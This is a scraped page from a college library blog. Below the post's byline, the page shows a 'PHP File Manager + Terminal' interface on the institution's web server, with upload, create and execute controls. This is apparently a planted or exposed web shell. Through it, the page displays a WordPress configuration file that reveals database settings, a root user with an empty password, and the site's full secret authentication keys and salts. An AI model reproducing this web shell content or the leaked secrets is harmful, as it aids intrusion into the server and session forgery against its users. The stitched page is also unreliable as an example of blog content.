Looking for something? Use OneSearch! Posted on January 23, 2020 (February 3, 2025) by Rebecca Hyams PHP File Manager + Terminal PHP File Manager + TerminalServer: www.bmcc.cuny.eduSoftware: Apache/2.4.62 (Debian)Current directory: //var/www/html Upload Create File Create Folder Execute Editing: /var/www/html/wp-config_local.php<?php /** Enable W3 Total Cache */ define('WP_CACHE', true); // Added by W3 Total Cache define( 'WP_DEBUG', false ); define( 'SAVEQUERIES', true ); /** Enable W3 Total Cache */ @ini_set('upload_max_size' , '256M' ); /*define( 'FORCE_SSL_LOGIN', false ); // Force SSL for Dashboard - Security > Settings > Secure Socket Layers (SSL) > SSL for Dashboard define( 'FORCE_SSL_ADMIN', false ); define('FLYWHEEL_DEFAULT_PROTOCOL', 'http://'); define( 'WP_SITEURL', 'http://localhost/wordpress_production' ); define( 'WP_HOME', 'http://localhost/wordpress_production' );*/ /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ /* */ define( 'WP_DEBUG_LOG', true ); define( 'WP_DEBUG_DISPLAY', false ); @ini_set( 'display_errors', 0); // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'wpdbg5_dev' ); /** Database username */ define( 'DB_USER', 'root' ); /** Database password */ define( 'DB_PASSWORD', '' ); /** Database hostname */ define( 'DB_HOST', 'localhost' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8mb4' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define('AUTH_KEY', '!~uHA80@atpx{K+?Je$1~4vg%W!0-^eqdU))QBR-dV|TI$ta|%RL|ChhX2Y(<#qD'); define('SECURE_AUTH_KEY', '1=9.9~E3KJ+Ym#06eNzO2Oj8#L}|qY;Ly1kn`i||XXdJ^2fr ?,/Nu@/:#u<r_;|'); define('LOGGED_IN_KEY', 'w3K&_OHO>~&bvo2-.kTa~!_ziWzt+LB]8JAp%A_C/NmD[WzaYTO:@VyZ9sX9krn$'); define('NONCE_KEY', 'U,AB;V+Wn5+FUmf4O8[/IY{g+^Y!5_`,g6JVa a(cAX!l8:lkVF]T;HB$kv<}z$X'); define('AUTH_SALT', 'o@6Aum=@OFC>4AxNDL-IT{ynk= Iy{O$Q)7.<>u>NF]whb_Ofs9y}C|4/<(S_-s-'); define('SECURE_AUTH_SALT', 'w,-W-Nr+8[(Z>x<m9QDd`heg,vveTyi-o>|Dc#@MABB?=p1p;)W/nivgLm:!-NRe'); define('LOGGED_IN_SALT', 'PqJa8zeco`w%HVYG^>Ejo|g6y3L<u4s<@Q<I`,G{$@pR+9}JJg)Dhe-[A]t5Z/=7'); define('NONCE_SALT', 'ligsJf!j{v|s=oAr:|h1k&T_]AbO{s*:,`nEJVmw4/V^1?z$Hz3!AI5DS(W<=VJ+'); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wp_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ /* Add any custom values between this line and the "stop editing" line. */ /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';Save